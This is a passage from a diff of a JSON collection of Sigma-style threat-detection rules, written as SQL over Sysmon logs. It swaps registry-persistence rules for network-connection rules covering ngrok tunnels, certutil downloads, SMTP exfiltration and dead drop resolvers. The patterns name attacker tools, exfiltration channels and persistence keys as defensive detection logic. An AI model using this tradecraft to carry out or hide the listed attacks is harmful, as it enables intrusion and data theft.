'\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_hh.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", - "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "title": "Suspicious Outbound SMTP Connections", + "id": "9976fa64-2804-423c-8a5b-646ade840773", "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Other SMTP tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND (DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND Image LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_outbound_smtp_connections.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 
'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "test", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT 
* FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", - "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_new_network_provider.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion" ], 
@@ -32559,4350 +32605,4326 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unknown" + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Persistence Via CHM Helper 
DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "id": "480421f9-417f-4d3b-9552-fd2728443ec8", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1102", + 
"attack.t1102.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((Details LIKE '(Empty)' ESCAPE '\\' OR Details LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR 
DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": 
"registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "RDP Sensitive Settings Changed to Zero", - "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", - "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_terminal_server_suspicious.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Wow6432Node Classes Autorun Keys 
Modification", - "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", + "status": "experimental", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", - "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "title": "Wuauclt Network Connection", + "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of wuauclt.exe over the network." 
